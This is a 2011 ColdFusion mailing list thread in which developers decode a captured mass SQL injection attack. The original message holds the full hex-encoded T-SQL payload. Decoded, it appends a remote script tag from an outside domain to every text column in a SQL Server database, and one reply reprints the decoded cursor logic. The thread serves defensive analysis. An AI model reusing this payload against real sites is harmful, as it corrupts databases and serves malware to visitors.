Yep.... a bit cleaner than the last attack like this I saw. -----Original Message----- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Friday, May 13, 2011 10:31 AM To: cf-talk Subject: Re: Can anyone decode this?
it is some very clever SQL though On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger <mkru...@cfwebtools.com>wrote: > > This tries to append a malicious script to all the character columns in > your > DB in the hopes that you will select them and output them to a page (thus > propogating the link). > > The script is a <script> block that redirects to a malicious site. Here's > the basic out line with the script removed. > > > > DECLARE @T varchar(255), > @C varchar(4000) > DECLARE Table_Cursor CURSOR FOR select a.name,b.name > from sysobjects a,syscolumns b > where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or > b.xtype=231 or b.xtype=167) > > > OPEN Table_Cursor > FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) > > BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''*****malicious > script******'' where '+@C+' not like ''%*****malicious script***''') > > FETCH NEXT FROM Table_Cursor INTO @T,@C END > > CLOSE Table_Cursor DEALLOCATE Table_Cursor > > > Mark A. Kruger, MCSE, CFG > (402) 408-3733 ext 105 > www.cfwebtools.com > www.coldfusionmuse.com > www.necfug.com > > > -----Original Message----- > From: Jeff Garza [mailto:j...@garzasixpack.com] > Sent: Friday, May 13, 2011 9:39 AM > To: cf-talk > Subject: RE: Can anyone decode this? > > > Put this in your SQL Query analyzer tool and change the EXEC at the end to > PRINT. It should print out the SQL Statement for you to see what they were > trying to do. > > Cheers, > > Jeff > > -----Original Message----- > From: Che Vilnonis [mailto:ch...@asitv.com] > Sent: Friday, May 13, 2011 7:31 AM > To: cf-talk > Subject: Can anyone decode this? > > > Can anyone decode this? This was a URL attack that was caught by some > custom > code. I tried decoding the string at > http://meyerweb.com/eric/tools/dencoder/ but had no luck. > > 113|736;DECLARE @S CHAR(4000);SET > > @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 > > 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F > > 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 > > 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E > > 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 > > 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 > > 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 > > 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 > > 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 > > 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D > > 22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363 > > 726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027272522 > > 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D > > 672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946455443 > > 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40432045 > > 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C65 > 5F437572736F72 AS CHAR(4000));EXEC(@S); > > Thanks, Che > > > > > > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344498 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm